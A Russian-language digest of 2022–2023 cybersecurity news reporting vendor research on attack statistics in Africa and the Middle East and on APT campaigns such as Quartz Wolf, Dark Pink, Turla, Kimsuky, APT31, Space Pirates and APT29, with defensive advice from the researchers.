В 2022 году в связи с политической обстановкой киберхулиганы активизировались, но в 2023 году число инцидентов, которые потребовали привлечения экспертов по расследованию, снизилось в 3 раза. Дело в том, что многочисленные массовые атаки научили компании и ИБ-отрасль лучше на них реагировать, а сами злоумышленники переключились на более серьезные цели.

При этом число атак, организованных кибермошенниками, продолжает расти и в 2023 году в сравнении с 2022 годом увеличилось на 30%. С наступлением 2023 года хакеров этого типа почти перестала интересовать монетизация, и вместо продажи данных в даркнете они начали публиковать их бесплатно или безвозвратно шифровать с целью нанесения большего ущерба пострадавшей стороне.

«
Цели вчерашних хактивистов сменились: вместо DDoS и дефейса мошенники пытаются взламывать и совершать деструктивные действия в отношении инфраструктуры организаций, в том числе объектов критической информационной инфраструктуры (КИИ). Мы считаем, что в 2024 году увеличится количество инцидентов с деструктивными последствиями, а с ростом импортозамещения хакеры начнут использовать российское ПО для проникновения через уязвимости софта, – прокомментировал Владислав Лашкин, руководитель отдела противодействия киберугрозам центра исследования Solar 4RAYS, ГК «Солар».
»

68% атак в странах Африки носят целенаправленный характер

Positive Technologies проанализировала актуальные киберугрозы на африканском континенте в 2022–2023 гг. и 27 июля 2023 года представила исследование. По данным экспертов, наиболее атакуемой в регионе является финансовая отрасль (на нее приходится почти каждая пятая атака - 18% всех успешных атак), а главные мотивации киберпреступников — прямая финансовая выгода и кража конфиденциальной информации. При этом в регионе помимо хактивистов действуют организованные хакерские группировки, нацеленные помимо финансовой выгоды на кибершпионаж. Большинство атак в исследованном периоде носили целенаправленный характер.

Телекоммуникации занимают второе место среди наиболее атакуемых отраслей (13% всех успешных атак). В пятерку самых атакуемых отраслей экономики также вошли государственные учреждения (12%), торговые (12%) и промышленные (10%) организации.

«
Пятерка «лидеров» наиболее атакуемых отраслей Африки выглядит нетипичной по сравнению с общемировой статистикой. В топ-5 целей злоумышленников попали телекоммуникации и торговля, причем телеком оказался на втором месте. Значительный прирост клиентов телекоммуникационных компаний по всему континенту позволяет злоумышленникам воздействовать как на отдельные компании, так и на целые регионы, — сказал аналитик Positive Technologies Екатерина Семыкина. — Преступники атакуют организации, чтобы нарушить деятельность компании и потребовать выкуп за восстановление систем, а также с целью кражи данных о пользователях. Компаниям необходимо принимать меры, чтобы предотвратить эксплуатацию уязвимостей и реализацию недопустимых событий. Мы рекомендуем обратить внимание на процесс управления уязвимостями в организации.
»

По данным исследования Positive Technologies, целенаправленный характер имели 68% успешных атак: в них злоумышленники были нацелены на конкретную организацию, частное лицо или отрасль. В атаках на организации злоумышленники чаще всего атакуют компьютеры, серверы и сетевое оборудование (85%).

Веб-ресурсы становились целями злоумышленников в 15% атак: как правило, в этих случаях чаще всего злоумышленникам удавалось успешно провести DDoS-атаки. Государственные и финансовые учреждения Африки регулярно подвергаются DDoS-атакам со стороны хактивистов. Эти нападения могут иметь серьезные последствия для функционирования важных инфраструктурных систем и сервисов.

Чаще всего атаки злоумышленников были направлены на получение конфиденциальной информации: с этим столкнулись 38% компаний. Также вследствие действий преступников возникали перебои в работе организаций: так, в каждой третьей успешной атаке (35%) основная деятельность компаний была нарушена. К прямым финансовым потерям привели 7% инцидентов.

Серьезной угрозой для региона являются шифровальщики, которые применялись в каждой третьей атаке на организации с использованием ВПО. Чаще всего злоумышленникам удается скомпрометировать компьютеры, серверы и сетевое оборудование, что свидетельствует о низком уровне защиты компаний и наличии уязвимостей на сетевом периметре.

Как сообщается в исследовании, теневые форумы являются активным пространством для торговли доступами к сетям крупных компаний Африки, включая государственные и финансовые учреждения, торговые и ИТ-компании. По данным открытых источников, за доступ с привилегиями администратора домена преступники готовы заплатить около 300 долларов США, а за доступ с привилегиями локального администратора — 170 долларов США. К тому же злоумышленники выкладывают в общий доступ и предлагают на продажу базы данных сотрудников и клиентов различных компаний.

В Positive Technologies отметили, что для успешной борьбы с киберугрозами в регионе необходимо активно разрабатывать и реализовывать меры, направленные на укрепление кибербезопасности. На фоне бурной цифровой трансформации в странах Африки назрела острая необходимость изменения подхода к ИБ. С увеличением доступности интернета можно ожидать и роста активности международных организованных киберпреступных сетей в регионе, причем более цифровизированные страны континента являются привлекательной мишенью для злоумышленников. При этом в регионе отсутствуют должные меры по внедрению кибербезопасности, недостаточно проработана законодательная база в этой сфере, а население крайне слабо осведомлено о проблемах, связанных с ИБ. Все эти факторы ведут к росту кибератак и существенному ущербу странам региона.

«
Для обеспечения киберустойчивости организаций в странах Африки, включая государственные и частные компании, критически важно определить недопустимые события и защитить критически значимые активы, — отметил директор экспертного центра безопасности Positive Technologies Алексей Новиков. — Также рекомендуется оснастить себя средствами защиты и внедрить меры мониторинга и реагирования на киберугрозы. Обучение сотрудников и инвестирование в развитие специалистов ИБ также будут играть ключевую роль в повышении уровня кибербезопасности организаций в африканском регионе.
»

Зафиксирован всплеск целенаправленных кибератак на государственные ИТ-системы многих арабских государств

Эксперты Positive Technologies зафиксировали всплеск целенаправленных кибератак на государственные ИТ-системы многих арабских государств. Об этом пресс-служба российской ИБ-компании сообщила 19 июля 2023 года.

Согласно исследованию, государственные учреждения Ближнего Востока являются особо привлекательными для киберпреступников целями: на них приходится 22% общего числа атак на организации, при этом 56% случаев — это атаки APT-группировок. Злоумышленники, используя широкий арсенал вредоносного ПО и эксплойтов, проникают в ИТ-инфраструктуру жертвы и остаются внутри на протяжении длительного времени с целью кибершпионажа.

Предприятия промышленного сектора также оказываются под угрозой (16% инцидентов), поскольку они имеют ценную информацию, являются объектами критической инфраструктуры и значительно влияют на экономику региона. Злоумышленники часто используют социальную инженерию для получения доступа к системам жертв (33%), а вредоносное ПО для удаленного управления (62%) и ПО, уничтожающее данные (31%), — инструменты, наиболее часто используемые в атаках на этот сектор.

По данным аналитиков, 78% кибератак на организации в Ближнем Востоке направлены на компьютеры, серверы и сетевое оборудование. Злоумышленники компрометируют системы загрузкой вредоносов или эксплуатацией уязвимостей для кражи конфиденциальной информации или для нарушения стабильной работы устройств.

Как отметили в Positive Technologies, особенностью кибератак на Ближнем Востоке стало применение вайперов, которые уничтожают файлы на скомпрометированных устройствах. Крайне опасно попадание вайперов на устройства автоматизированных систем управления технологическим процессом (АСУ ТП), так как это может привести к нарушению производства и авариям.

Особое внимание эксперты обращают на рост активности группировок вымогателей, которые стали одной из главных угроз. Число инцидентов с шифровальщиками в первом квартале 2023 года в мире выросло на 77% по сравнению с аналогичным периодом предыдущего года. Страны Персидского залива, включая ОАЭ, Саудовскую Аравию и Кувейт, — наиболее атакуемые в Ближневосточном регионе.

Российские хакеры импортозаместились

Эксперты управления киберразведки BI.ZONE зафиксировали атаки группировки Quartz Wolf на гостиничный бизнес. Против российских компаний впервые используется отечественное решение для удаленного доступа. Таким образом преступники обходят традиционные средства защиты и успешно закрепляются в инфраструктуре бизнеса. Об этом компания BI.Zone сообщила 19 июля 2023 года.

Злоумышленники часто применяют иностранные инструменты удаленного доступа, чтобы закрепиться в инфраструктуре взломанной компании. Наиболее популярные программы для этого — TeamViewer, AnyDesk и AmmyAdmin. Ими же часто пользовались сами компании для различных бизнес-целей, поэтому службы безопасности не могли блокировать такие программы. Однако теперь многие российские организации переходят на отечественное ПО, поэтому стало возможным блокировать зарубежный софт, который могут использовать злоумышленники. Группировка Quartz Wolf адаптировала атаки: чтобы обойти традиционные средства защиты, она использует отечественные решения для удаленного доступа. Это повышает шансы атакующих оставаться незамеченными в инфраструктуре.

Злоумышленники рассылают фишинговые электронные письма от лица компании «Федеральный Гостиничный Сервис», которая помогает передавать сведения о регистрации и данных для миграционного учета в МВД. В сообщениях атакующие якобы уведомляют о вступивших в силу изменениях в процедуре регистрации, с которыми необходимо срочно ознакомиться по приложенной ссылке. Пользователь скачивает архив, открывает его и, сам того не зная, запускает вредоносный файл. При этом устанавливается российское решение для удаленного доступа «АССИСТЕНТ» — ПО, которое в собственных бизнес-целях используют различные компании.[5]

Удаленный доступ позволяет атакующим перехватывать управление скомпрометированной системой, блокировать устройства ввода, копировать файлы, модифицировать реестр, использовать командную строку Windows и т. п. Это открывает возможности злоумышленникам: от кражи учетных данных для входа в бизнес-системы и передачи данных клиентов на сторонний сервер до совершения операций в банковском ПО от имени жертвы.

«
Использование легитимных средств позволяет атакующим оставаться незамеченными в скомпрометированной сети продолжительное время, особенно если такое ПО уже используется организацией. На примере Quartz Wolf мы видим, что злоумышленники следят за трендами импортозамещения. Они меняют методы, чтобы их действия по-прежнему выглядели как активность обычных пользователей,
сказал Олег Скулкин, руководитель управления киберразведки BI.ZONE.
»

Фишинговые рассылки остаются одним из главных методов получения первоначального доступа во время целевых атак. Чтобы защититься от них, эксперты BI.ZONE рекомендуют пользоваться специализированными решениями, которые блокируют спам и вредоносные письма. Эффективно реагировать на угрозы помогут сервисы непрерывного мониторинга ИТ-инфраструктуры. Они позволяют оперативно распознать продвинутые атаки и нейтрализовать угрозы.

Хакерская группировка Space Pirates атакует госсектор, авиационную и ракетно-космическую промышленность России

Хакерская группировка Space Pirates атакует госсектор, авиационную и ракетно-космическую промышленность России. Об этом 17 июля 2023 года сообщили специалисты экспертного центра безопасности Positive Technologies (PT Expert Security Center, PT ESC). Подробнее здесь.

APT-группировка Dark Pink наносит киберудары по азиатским правительственным и военным структурам

APT-группировка Dark Pink наносит киберудары по азиатским правительственным и военным структурам. Об этом стало известно 11 января 2023 года.

В ходе атак хакеры используют набор мощных кастомных инструментов и новых тактик.

Проводя расследование, Group-IB подчеркнула, что Dark Pink может быть совершенно новой APT-группировкой. Свое название банда хакеров получила из-за имен некоторых электронных ящиков, на которые высылались украденные данные. Однако китайские исследователи дали ей другое название – Saaiwc Group.

Аналитики Group-IB раскрыли семь кибератак, за которыми стоит Dark Pink, а после обнаружения GitHub-аккаунта группировки предположили, что злоумышленники вышли на киберпреступную арену еще в середине 2021 года.

Большая часть атак была направлена на Азиатско-Тихоокеанский регион, среди подтвержденных жертв – два военных ведомства на Филиппинах и в Малайзии, правительственные учреждения в Камбодже, Индонезии, Боснии и Герцеговине, а также религиозная организация во Вьетнаме.

В ходе кибератак Dark Pink применяет целый ряд тактик и набор из мощных кастомных инструментов: TelePowerBot, KamiKakaBot, Cucky и Ctealer. Эти модули используются для кражи важной информации, которая хранится в сетях правительственных и военных организаций.

Первоначальный доступ к сетям группировка получала с помощью фишинговых писем с вредоносным ISO-образом внутри. В одном из обнаруженных писем хакеры выдавали себя за соискателя, претендующего на должность стажера по связям с общественностью.

Основных методов заражения у группировки всего две:

  • Боковая загрузка DLL;
  • Внесение изменений в реестр значения, определяющий программу, ассоциируемую с открытием файла. Таким образом, когда пользователь пытается открыть нужный документ, это приводит к запуску вредоносной программы, вшитой в заранее созданную копию этого документа.

По словам специалистов, Dark Pink не только крадет информацию, но и заражает USB-устройства, подключенные к взломанным компьютерам, получает доступ к мессенджерам, а также захватывает звук с микрофонов взломанных устройств[6].

Группа Turla Team использует закрытые домены 2013 года для атак на жертвы старого ботнета

9 января 2023 года стало известно о том, что исследователи кибербезопасности Mandiant обнаружили, что группировка Turla Team использует инфраструктуру вредоносной программы Andromeda десятилетней давности для распространения своих шпионских инструментов среди целей на Украине.

По словам аналитиков, APT-группа Turla Team (также известная как UNC4210) взяла под свой контроль 3 домена, которые были частью ныне несуществующей инфраструктуры управления и контроля (C&C) сети ботнетов Andromeda (Gamarue), чтобы повторно подключиться к скомпрометированным системам. Конечная цель заключалась в распространении среди жертв Andromeda разведывательной утилиты KOPILUWAK и бэкдора QUIETCANARY (Tunnus).

Andromeda состояла из 464 отдельных ботнетов и заражала порядка 1,1 млн. компьютеров ежемесячно. В рамках правоохранительной операции в 2017 году было отключено около 1,5 тыс. доменов и IP-адресов, использовавшихся в C&C-инфраструктуре.

Andromeda продолжает распространяться с заражённых USB-устройств, поэтому перерегистрированные домены всё ещё представляют опасность, и злоумышленники могут взять их под контроль, чтобы доставить новые вредоносные программы жертвам. Скорей всего, Turla Team скомпрометируют системы, а затем продадут доступ к ним на подпольных форумах.

В ходе обнаруженного инцидента сотрудник неназванной украинской организации вставил зараженный USB-накопитель в рабочий компьютер в декабре 2021 года и нажал на вредоносный LNK-файл, маскирующийся под папку на USB-накопителе. Это привело к развертыванию Andromeda на хосте.

Примечательно, что, если пользователь вставляет «чистый» USB-накопитель в уже зараженную систему, этот новый USB-накопитель может заразиться и продолжить распространение Andromeda.

Злоумышленники пытались скрытно профилировать системы, чтобы определить наиболее интересные цели, которые затем атаковали. Mandiant наблюдала активность серверов Turla Team только в течение коротких периодов времени, обычно несколько дней, с неделями простоя[7].

2022

Продажи доступов к промышленным предприятиям в мировом даркнете выросли на 40%

Число доступов к инфраструктуре промышленных организаций в мире, выставленных в 2022 году на продажу в даркнете, составило 122, что на 40% больше, чем годом ранее. Такие данные эксперты Positive Technologies обнародовали в конце февраля 2023 года.

Доступы составляют 75% всех объявлений, относящихся к промышленности, а их стоимость обычно колеблется от $500 до $5000. Индустриальный сектор привлекает легким заработком даже малоквалифицированных киберпреступников: они получают первоначальный доступ, а затем продают его более компетентным злоумышленникам для дальнейшего развития атаки, говорится в исследовании.

Всего за 2022 год в промышленных компаниях было зафиксировано 223 инцидента, вызванных атаками злоумышленников, что на 7% больше по сравнению с 2021-м. Наибольшее количество инцидентов пришлось на второй квартал 2022 года — тогда было выявлено 75 успешных атак. Среди атак на организации промышленного сектора 97% являлись целевыми; на атаки APT-группировок пришлось 17% от общего количества инцидентов.

Из успешных атак 87% были направлены на компьютеры, серверы и сетевое оборудование — основные мишени вымогателей. В 44% случаев злоумышленники проводили атаки на персонал промышленных организаций с помощью вредоносных рассылок по электронной почте (94%) и фишинговых сайтов (10%). Направлены на веб-ресурсы (сайты) организаций промышленного сектора были 12% атак.

Из отчета Positive Technologies также следует, что в большинстве успешных атак (70%) на промышленные организации злоумышленники применяли вредоносное ПО. Почти в половине кибератак (44%) на промышленность были использованы методы социальной инженерии. Доля атак, в которых эксплуатировались уязвимости ПО, составила 43%.

Трендом кибератак в 2022 году стало применение в атаках на промышленный сектор вайперов (ПО, удаляющее данные на устройстве). Применение этого ВПО приводило к нарушениям технологических процессов и выходу оборудования из строя.[8]

Log4Shell остается грозным оружием в руках иранских киберпреступников

Иранская APT-группировка получила доступ к серверу федерального агентства США, используя печально известную Log4Shell. Об этом стало известно 17 ноября 2022 года. Эксперты предполагают, что хакерская операция началась в феврале 2022 года, после чего была раскрыта CISA два месяца спустя.

Согласно совместному отчету, опубликованному CISA и ФБР, хакеры воспользовались Log4Shell, чтобы проникнуть на уязвимый сервер VMware Horizon, после чего развернули на нем криптомайнер XMRig. Затем злоумышленники переместились на контроллер домена, скомпрометировали учетные данные и внедрили сервис Ngrok на несколько хостов, чтобы закрепиться в системе.

Ngrok – это сервис, который позволяет открыть доступ к внутренним ресурсам машины, на которой он запущен, из внешней сети, путем создания публичного адреса, все запросы на который будут переброшены на локальный адрес и заданный порт.

Правоохранительные органы не сообщили, какая федеральная организация стала жертвой хакеров, сказав лишь, что она является одним из агентств (Federal Civilian Executive Branch Agencies, FCEB).

Кроме того, в отчете CISA и ФБР призвали все организации с потенциально уязвимыми системами VMware немедленно применить все доступные обновления или обходные пути, задуматься о возможной компрометации и просканировать системы на вредоносное ПО и следы взлома[9].

Число кибератак на автоматизированные системы управления в России взлетело на 80%

20 сентября 2022 года эксперты «Лаборатории Касперского» опубликовали исследование, в котором сообщили о росте количества целевых кибератак на промышленные предприятия в России. Чаще всего вредоносные объекты проникают на компьютеры автоматизированных систем управления (АСУ) из интернета.

В январе-июне 2022 года атаки на системы автоматизации с помощью вредоносных документов выросли на 80%, а доля компьютеров таких систем, на которых были заблокированы программы-вымогатели, увеличилась на 10%, достигнув максимума с 2020 года.

Число кибератак на автоматизированные системы управления в России взлетело на 80%

Согласно отчету, кибернападению в первой половине 2022 года подвергались одновременно и системы автоматизации зданий, и информационные системы расположенных в этих зданиях организаций. Также по сравнению с 2021 годом выросла доля атакованных компьютеров АСУ ТП в нефтегазовой отрасли.

По словам руководителя Kaspersky Industrial Systems Emergency Response Team (ICS SERT) Евгения Гончарова, далеко не все автоматизированные системы управления действительно изолированы от интернета, это и является основной причиной, почему вредоносное ПО часто проникает в технологические сети.

«
Корпоративная почта на компьютерах в технологической сети открывает дорогу шпионскому ПО, распространяемому через фишинговые письма, часто от одного промышленного предприятия к другому в письмах, замаскированных под корреспонденцию организаций-жертв… Важно использовать комплексные специализированные защитные решения нового поколения, которые в том числе позволят обеспечить защиту ИТ- и ОТ-сегмента в рамках единой системы ИБ, — пояснил он.

»

Многие атаки на промышленность начинаются с попыток проникновения через устройства корпоративной сети. Поэтому предприятиям необходимо укреплять кибербезопасность технологического сегмента, покрывая каждый элемент инфраструктуры, добавили эксперты.[10]

APT-группа, стоящая за атакой на SolarWinds, использует зловред MagicWeb для посткомпрометации Active Directory

Злоумышленники, ответственные за атаку на цепочку поставок SolarWinds, стали использовать вредоносное ПО MagicWeb для посткомпрометации, которое применяется для поддержания постоянного доступа к скомпрометированной среде и совершения бокового перемещения. Об этом стало известно 25 августа 2022 года. Исследователи из Microsoft обнаружили, как APT-группа Nobelium использует бэкдор после получения прав администратора на сервере Active Directory Federated Services (AD FS). Подробнее здесь.

Северокорейская APT-группа атакует политические и дипломатические организации Южной Кореи

Согласно отчету Лаборатории Касперского, северокорейская APT-группа Kimsuky проводит кампанию против политических и дипломатических организаций Южной Кореи, а также профессоров южнокорейских университетов, исследователей аналитических центров и правительственных чиновников. Об этом стало известно 25 августа 2022 года.

Иллюстрация:itkvariat.com

Лаборатория Касперского ранее присвоила бэкдору группы название GoldDragon, а цепочки заражения привели к развертыванию вредоносных программ для Windows, предназначенных для сбора файлов, нажатий клавиш и кражи учетных данных для входа в веб-браузер.

В обнаруженной кампании Kimsuky использует фишинговые сообщения, содержащие документ Word с макросами, который предположительно содержат контент, связанный с геополитическими проблемами в регионе.

Группа использует особенности файлов HTML-Application (HTA) и Compiled HTML Help (CHM) в качестве приманки для компрометации системы.

Независимо от используемого метода, после первоначального доступа происходит внедрение сценария Visual Basic Script с удаленного сервера, предназначенного для снятия цифрового отпечатка машины жертвы и извлечения дополнительных полезных данных, включая исполняемый файл для извлечения конфиденциальной информации.

Как отмечается, кампания содержит также ранее не применявшийся метод атаки. Если получатель щелкнет ссылку в электронном письме для загрузки дополнительных документов, то его email-адрес передается на сервер управления и контроля (C&C). Если запрос не содержит ожидаемого email-адреса, то жертве открывается для скачивания легитимный незараженный документ.

Чтобы еще больше усложнить цепочку заражений, первый C&C-сервер перенаправляет IP-адрес жертвы на другой VBS-сервер, который затем сравнивает его со входящим запросом, который генерируется после открытия жертвой документа-приманки. «Проверка жертвы» на двух C&C-серверах гарантирует, что VBScript доставляется только после благополучной проверки IP-адреса, что указывает на узконаправленную атаку.

По словам Лаборатории Касперского, группа Kimsuky постоянно развивает свои схемы заражения вредоносным ПО и внедряет обновленные методы, чтобы затруднить анализ. Основная трудность в отслеживании этой группы заключается в том, что сложно определить полную цепочку заражения[11].

Выявлены атаки китайских хакеров на оборонные учреждения России

8 августа 2022 года в «Лаборатории Касперского» сообщили о деятельности китайскоязычной кибергруппировки TA428, которая, по данным экспертов, атакует оборонные предприятия и госорганы в России, странах Восточной Европы и Афганистане.

Сообщается, что хакеры в рамках целевых атак применяют новые модификации известных ранее бэкдоров. Атакующим удалось в ряде случаев полностью захватить ИТ-инфраструктуру. Для этого они использовали хорошо подготовленные фишинговые письма. В них содержалась внутренняя информация, не доступная в публичных источниках на момент её использования злоумышленниками, в том числе Ф. И. О. сотрудников, работающих с конфиденциальной информацией, и внутренние кодовые наименования проектов.

Выявлены атаки китайских хакеров в сторону России

К фишинговым письмам были прикреплены документы Microsoft Word с вредоносным кодом, эксплуатирующим уязвимость CVE-2017-11882 . Она позволяет вредоносной программе без дополнительных действий со стороны пользователя получить управление заражённой системой, от пользователя даже не требуется включать выполнение макросов.

В качестве основного инструмента развития атаки злоумышленники использовали утилиту Ladon с возможностями для сканирования сети, поиска и эксплуатации уязвимостей, кражи паролей. На финальном этапе они захватывали контроллер домена и далее получали полный контроль над интересующими злоумышленников рабочими станциями и серверами организации.

Получив необходимые права, злоумышленники приступали к поиску и загрузке файлов, содержащих конфиденциальные данные, на свои серверы, развёрнутые в разных странах. Эти же серверы использовались для управления вредоносным ПО.

«
Целевой фишинг остаётся одной из наиболее актуальных угроз для промышленных предприятий и государственных учреждений. Серия атак, которую мы обнаружили, — не первая, по всей видимости, во вредоносной кампании, — отметил старший эксперт Kaspersky ICS CERT Вячеслав Копейцев.[12]
»

Кибергруппировка APT31 атакует российский топливно-энергетический комплекс и СМИ

В апреле 2022 года специалисты PT Expert Security Center компании Positive Technologies в ходе ежедневного мониторинга угроз выявили атаку на ряд российских организаций (СМИ и энергетические компании) с использованием вредоносного документа. Об этом представители Positive Technologies сообщили TAdviser 4 августа 2022 года.

Анализ вредоносного ПО (ВПО), использованного злоумышленниками, показал, что за этими атаками стоит группировка APT31. В обеих кампаниях зафиксированы идентичные фрагменты кода, получающего информацию о сетевых адаптерах и собирающего данные о зараженной системе, заглушки в документах имели явное сходство, а для управления вредоносным ПО применялись облачные серверы.

Внешний вид вредоносного документа

Исследование инструментов выявило использование атакующими сервиса «Яндекс.Диск» в качестве контрольного сервера (применяется злоумышленниками для связи с подконтрольными системами в сети жертвы). Как пояснил эксперт Positive Technologies Даниил Колосков, APT31 задействовала популярный облачный сервис в том числе для того, чтобы трафик был похож на легитимный.

«
«Ранее эта группировка аналогичным образом использовала облачный сервис Dropbox. Подобную технику обхода сетевых средств защиты с помощью легитимного сервиса применяла также группировка TaskMasters в своем ВПО Webdav-O», — добавил эксперт Positive Technologies.
»

Сведения о цифровой подписи легитимного исполняемого файла

Экземпляры изученного ВПО датируются периодом с ноября 2021 года по июнь 2022-го. Все они содержат легитимные файлы, основная задача которых — передача управления вредоносной библиотеке с помощью, например, техники DLL Side-Loading (злоумышленники могут выполнять свои собственные вредоносные полезные нагрузки, загружая библиотеки DLL) и формирование инициализирующего пакета, который отправляется на контрольный сервер. Значительная часть выявленных легитимных исполняемых файлов является каким-либо компонентом «Яндекс.Браузера» и подписана действительной цифровой подписью.

По информации Positive Technologies, в ходе анализа было выявлено две новых разновидности вредоносного ПО, которые получили название YaRAT (так как использует «Яндекс.Диск» в качестве контрольного сервера плюс обладает функциональностью RAT (от англ. Remote administration tool, средство удаленного администрирования или управления) и Stealer0x3401 (по константе, используемой при обфускации (способ затруднить анализ кода или его модификацию при декомпиляции) ключа шифрования). В случае YaRAT в качестве легитимного файла, уязвимого для DLL Side-Loading, использовался инсталлятор «Яндекс.Браузера», подписанный действительной цифровой подписью «Яндекса» (либо его portable-версия). Во вредоносном ПО Stealer0x3401 применялся легитимный бинарный файл dot1xtray.exe, подгружающий вредоносную библиотеку msvcr110.dll.

«
«В 2021 году деятельность APT31 была отмечена нами в Монголии, России, США и других странах, — рассказал Даниил Колосков. — Атаки, обнаруженные нами в этом году, имеют схожие техники заражения и закрепления, многочисленные пересечения в рамках кода, а также схожие артефакты используемых средств компиляции. Все это позволяет сделать вывод, что исследованная нами группировка по-прежнему функционирует и может продолжить атаки на организации в России».
»

По словам Даниила Колоскова, вредоносное ПО, использующее в качестве контрольного сервера «Яндекс.Диск», крайне сложно детектировать по сетевому взаимодействию. Фактически это обычный легитимный трафик между клиентом и сервисом. Эти зловреды можно обнаружить лишь в динамике при помощи средств мониторинга, в том числе и антивирусными технологиями.

«
«Важно работать превентивно — рассказывать сотрудникам о мерах цифровой гигиены и об используемых злоумышленниками фишинговых техниках. Кроме того, в компании желательно иметь отдельный адрес, куда сотрудники смогут присылать образцы полученных подозрительных писем и сообщать о них специалистам по ИБ. Конечно же, нужно использовать и антивирусные продукты, песочницы и системы класса EDR/XDR для обнаружения угроз и реагирования на них», — заключил эксперт.
»

Недавняя уязвимость 0-day в Microsoft Office уже эксплуатируется китайской APT-группировкой

Недавняя уязвимость 0-day в Microsoft Office уже эксплуатируется китайскими хакерами. Об этом стало известно 1 июня 2022 года. Подробнее здесь.

Обнаружена кибергруппировка, атакующая госсектор, электроэнергетику и авиационно-космическую отрасль в России

17 мая 2022 года компания Positive Technologies сообщила, что ее экспертный центр безопасности (PT Expert Security Center, PT ESC) обнаружил очередную киберпреступную группировку. В России злоумышленники атаковали по меньшей мере пять организаций, в Грузии - одну, а точное число пострадавших в Монголии пока неизвестно. Среди целей атакующих, идентифицированных специалистами Positive Technologies, - госучреждения и предприятия из авиационно-космической и электроэнергетической отраслей.

Ключевые связи Space Pirates c известными APT-группировками, семействами ВПО и фрагментами сетевой инфраструктуры

По полученным данным, неизвестная ранее APT-группа действует как минимум с 2017 года, ее ключевые интересы - шпионаж и кража конфиденциальной информации. Эксперты Positive Technologies дали группировке имя Space Pirates по направленности первой выявленной ими атаки на авиационно-космический сектор и строке P1Rat, которую атакующие использовали в PDB-путях.

В первый раз следы активности группы экспертный центр зафиксировал в конце 2019 года, когда одно российское авиационно-космическое предприятие получило фишинговое письмо с ранее не встречавшимся вредоносным ПО. В течение двух последующих лет специалисты PT ESC выявили еще четыре отечественные компании (причем две из них - с госучастием), которые были скомпрометированы с использованием того же ВПО и сетевой инфраструктуры.

По оценке экспертов Positive Technologies, по меньшей мере две атаки Space Pirates в России достигли своих целей. В первом случае злоумышленники получили доступ как минимум к 20 серверам в корпоративной сети, где присутствовали около 10 месяцев. За это время они похитили более 1500 внутренних документов, а также данные всех учетных записей сотрудников в одном из сетевых доменов. Во втором - атакующим удалось закрепиться в сети компании более чем на год, получить сведения о входящих в сеть компьютерах и установить свое ВПО по крайней мере на 12 корпоративных узлов в трех различных регионах.

Особый интерес представляет инструментарий Space Pirates, который состоит из необычных загрузчиков (в изучаемых случаях они содержали приманки с русским текстом) и ранее не описанных бэкдоров, таких как MyKLoadClient, BH_A006 и Deed RAT.

«
«Зловреды собственной разработки специфичны, поэтому по ним можно вычислять причастность Space Pirates к той или иной кибератаке. Например, в бэкдоре, который мы назвали Deed RAT, реализован нестандартный метод передачи управления шеллкоду. Именно шеллкод позволяет злоумышленникам получать права администратора на зараженном компьютере», -

рассказал Алексей Захаров, старший специалист отдела исследования угроз ИБ Positive Technologies.
»

В арсенале Space Pirates есть и хорошо известное ВПО: бэкдоры PlugX, PoisonIvy, с, Zupdax и публичный шелл ReVBShell. Также атакующие применяют билдер Royal Road RTF (или 8.t) и модифицированный бэкдор PcShare, встречаемые главным образом в среде хакеров азиатского происхождения, а в ресурсах, SFX-архивах и путях к PDB-файлам часто используется китайский язык. Вредоносы чаще всего распространяют с помощью целевого фишинга, то есть группировка всегда точно знает, кого атакует.

Изучив деятельность APT-группы, эксперты компании также обнаружили большое число пересечений с ранее известной активностью, которую исследователи связывают с группировками Winnti (APT41), Bronze Union (APT27), TA428, RedFoxtrot, Mustang Panda и Night Dragon. Вероятная причина, по словам специалистов Positive Technologies, кроется в обмене инструментарием между группировками. Это частое явление для APT-групп азиатского региона.

«
«В одном из расследований мы наблюдали на зараженных компьютерах активность не только группы Space Pirates, но и TA428, а по сетевой инфраструктуре в другой атаке мы проследили связь между Zupdax и трояном RemShell, приписываемым TA428. Это позволяет утверждать, что Space Pirates и TA428 могут объединять усилия и делиться инструментами, сетевыми ресурсами и доступами к инфицированным системам», -

комментирует Денис Кувшинов, руководитель отдела исследования угроз ИБ Positive Technologies.
»

Экспертный центр безопасности Positive Technologies продолжает отслеживать активность Space Pirates и ее связи с другими APT-группировками.

Российские хакеры развернули масштабную целевую фишинговую кампанию

3 мая 2022 года стало известно о том, что российские хакеры развернули масштабную целевую фишинговую кампанию.

В середине января 2022 года специалисты компании Mandiant обнаружили кампанию целевого фишинга, запущенную российской группировкой APT29. Атака была направлена на дипломатов и правительственные организации. Ранее группа работала вместе с APT28, участвовала во взломе Демократического национального комитета, и в волне атак, направленных на выборы президента США в 2016 году. В недавней кампании хакеров, раскрытой Mandiant, инструментом атаки стали фишинговые сообщения, отправленные со взломанных электронных ящиков посольств разных стран. Госслужащие использовали Atlassian Trello, DropBox и облачные сервисы как части своей C&C инфраструктуры.

Эксперты наблюдали несколько волн атак в период с января 2022 года по март 2022 года.

Хронология фишинговой кампании 2022 г.
«
APT29 нацелилась на большие списки получателей, большая часть из которых – публичные контактные лица. – говорится в анализе, опубликованном Mandiant. В фишинговых письмах использовался вредоносный HTML-дроппер ROOTSAW, применяющий прием HTML Smuggling для доставки зараженного IMG или ISO файла в систему жертвы.

»

После открытия вложенного в письмо файла ROOTSAW записывает на диск данные в IMG или ISO формате. Образ содержит ярлык Windows (LNK) и вредоносную DLL-библиотеку. При клике по LNK-файлу выполняется вредоносная DLL. Чтобы обмануть жертву и заставить запустить файл, злоумышленники используют поддельную иконку.

После выполнения DLL в память доставляется и запускается загрузчик BEATDROP.

«
BEATDROP написан на C и использует Trello для создания C&C сервера. Только запустившись, загрузчик сразу создает копию своей библиотеки ntdll.dll в памяти устройства для выполнения шелл-кода внутри собственного процесса. BEATDROP создает приостановленный поток с RtlCreateUserThread, указывающий на NtCreateFile, – указано в отчете. Потом загрузчик сканирует систему для получения имени пользователя, компьютера и IP-адреса. Из собранной информации создается ID жертвы, который BEATDROP использует для хранения данных жертвы и отправки вредоносных пакетов из C&C сервера. Создав ID, BEATDROP делает запрос в Trello и определяет, взламывался ли аккаунт жертвы раньше.
»

Эксперты также сообщили, что APT29 заменила BEATDROP на BEACON. Данный загрузчик создан на основе Cobalt Strike и реализует возможности бэкдора, включая запись клавиатуры, создание скриншотов, сбор и извлечение различных данных, сканирование портов и многое другое.

Закрепившись в нужной сети, группировка быстро пытается повысить привилегии. Иногда хакерам удавалось получить права администратора домена менее чем за 12 часов после фишинговой атаки.

Получив доступ, злоумышленники проводят обширную разведку узлов и среды активных каталогов. APT29 также была замечена в проведении разведки на хостах для сбора учетных данных.

